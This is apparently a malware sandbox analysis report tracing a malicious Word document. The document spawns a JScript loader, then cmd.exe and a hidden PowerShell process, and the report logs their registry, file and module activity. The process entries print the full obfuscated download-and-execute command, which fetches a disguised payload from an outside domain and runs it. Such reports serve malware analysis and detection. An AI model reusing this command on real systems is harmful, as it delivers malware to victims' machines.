Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (75)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 68
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Process #15: wscript.exe
186 0
»
Information Value
ID #15
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:07, Reason: Child Process
Unmonitor End Time: 00:01:11, Reason: Self Terminated
Monitor Duration 00:00:04
OS Process Information
»
Information Value
PID 0x1ec
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 478
0x AEC
0x B08
0x A04
0x B0C
0x 9EC
0x A00
0x A0C
0x B28
0x B7C
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create shell.applicatiOn IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 192, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 192, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 192, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 192, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create cmd.exe show_window = 2273344 True 1
Fn
Module (27)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xffdb0000 True 3
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 2
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefea62e18 True 1
Fn
Get Address c:\windows\system32\wscript.exe function = 1, address_out = 0xffdbd7f8 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 2841184 True 1
Fn
System (78)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:10 (UTC) True 4
Fn
Get Time type = Ticks, time = 137904 True 1
Fn
Get Time type = Performance Ctr, time = 19200664493 True 1
Fn
Get Time type = Ticks, time = 138263 True 1
Fn
Get Time type = Performance Ctr, time = 19237375087 True 1
Fn
Get Time type = Ticks, time = 138279 True 2
Fn
Get Time type = Ticks, time = 138326 True 1
Fn
Get Time type = Performance Ctr, time = 19243861164 True 1
Fn
Get Time type = Ticks, time = 138341 True 1
Fn
Get Time type = Performance Ctr, time = 19245346888 True 1
Fn
Get Time type = Ticks, time = 138840 True 1
Fn
Get Time type = Ticks, time = 139121 True 1
Fn
Get Time type = Ticks, time = 139464 True 1
Fn
Get Time type = Ticks, time = 139620 True 3
Fn
Get Time type = Ticks, time = 139636 True 1
Fn
Get Time type = Ticks, time = 139652 True 3
Fn
Get Time type = Ticks, time = 139698 True 3
Fn
Get Time type = Ticks, time = 139714 True 2
Fn
Get Time type = Ticks, time = 139730 True 3
Fn
Get Time type = Ticks, time = 139823 True 2
Fn
Get Time type = Ticks, time = 139839 True 5
Fn
Get Time type = Ticks, time = 139870 True 1
Fn
Get Time type = Ticks, time = 139886 True 3
Fn
Get Time type = Ticks, time = 139901 True 1
Fn
Get Time type = Ticks, time = 139948 True 1
Fn
Get Time type = Ticks, time = 139964 True 1
Fn
Get Time type = Ticks, time = 139979 True 2
Fn
Get Time type = Ticks, time = 139995 True 4
Fn
Get Time type = Ticks, time = 140010 True 1
Fn
Get Time type = Ticks, time = 140042 True 1
Fn
Get Time type = Ticks, time = 140057 True 3
Fn
Get Time type = Ticks, time = 140104 True 1
Fn
Get Time type = Ticks, time = 140166 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:12 (UTC) True 1
Fn
Get Time type = Ticks, time = 140182 True 2
Fn
Get Time type = Performance Ctr, time = 19431117291 True 1
Fn
Get Time type = Ticks, time = 140198 True 3
Fn
Get Info type = Operating System True 6
Fn
Get Info type = Operating System True 1
Fn
Get Info type = System Directory, result_out = Üó" True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #16: cmd.exe
62 0
»
Information Value
ID #16
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:10, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:14
OS Process Information
»
Information Value
PID 0xba0
Parent PID 0x1ec (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B8C
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info PowErshelL.eXe type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xbc4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:13 (UTC) True 1
Fn
Get Time type = Ticks, time = 141617 True 1
Fn
Get Time type = Performance Ctr, time = 19576788319 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 3
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #17: wscript.exe
184 0
»
Information Value
ID #17
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:11, Reason: Child Process
Unmonitor End Time: 00:01:19, Reason: Self Terminated
Monitor Duration 00:00:08
OS Process Information
»
Information Value
PID 0xbb0
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BBC
0x B6C
0x B9C
0x B5C
0x C0
0x 888
0x 8BC
0x BA4
0x 154
0x 8EC
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create shell.applicatiOn IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 112, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module (27)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff540000 True 3
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 2
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefea62e18 True 1
Fn
Get Address c:\windows\system32\wscript.exe function = 1, address_out = 0xff54d7f8 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 2841184 True 1
Fn
System (78)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:14 (UTC) True 1
Fn
Get Time type = Ticks, time = 142148 True 1
Fn
Get Time type = Performance Ctr, time = 19630544208 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:15 (UTC) True 3
Fn
Get Time type = Ticks, time = 142943 True 1
Fn
Get Time type = Performance Ctr, time = 19710117088 True 1
Fn
Get Time type = Ticks, time = 142959 True 2
Fn
Get Time type = Ticks, time = 143380 True 1
Fn
Get Time type = Performance Ctr, time = 19754809945 True 1
Fn
Get Time type = Ticks, time = 143396 True 1
Fn
Get Time type = Performance Ctr, time = 19756051778 True 1
Fn
Get Time type = Ticks, time = 144316 True 1
Fn
Get Time type = Ticks, time = 144675 True 1
Fn
Get Time type = Ticks, time = 144753 True 1
Fn
Get Time type = Ticks, time = 144956 True 3
Fn
Get Time type = Ticks, time = 145065 True 4
Fn
Get Time type = Ticks, time = 145080 True 4
Fn
Get Time type = Ticks, time = 145190 True 3
Fn
Get Time type = Ticks, time = 145205 True 1
Fn
Get Time type = Ticks, time = 145299 True 2
Fn
Get Time type = Ticks, time = 145314 True 4
Fn
Get Time type = Ticks, time = 145330 True 2
Fn
Get Time type = Ticks, time = 145424 True 1
Fn
Get Time type = Ticks, time = 145439 True 3
Fn
Get Time type = Ticks, time = 145455 True 1
Fn
Get Time type = Ticks, time = 145626 True 3
Fn
Get Time type = Ticks, time = 145642 True 5
Fn
Get Time type = Ticks, time = 145767 True 1
Fn
Get Time type = Ticks, time = 145782 True 3
Fn
Get Time type = Ticks, time = 145798 True 1
Fn
Get Time type = Ticks, time = 145923 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:18 (UTC) True 1
Fn
Get Time type = Ticks, time = 145938 True 2
Fn
Get Time type = Performance Ctr, time = 20016612310 True 1
Fn
Get Time type = Ticks, time = 146048 True 2
Fn
Get Time type = Ticks, time = 146063 True 1
Fn
Get Info type = Operating System True 6
Fn
Get Info type = Operating System True 1
Fn
Get Info type = System Directory, result_out = Ι True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #18: powershell.exe
343 0
»
Information Value
ID #18
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:11, Reason: Child Process
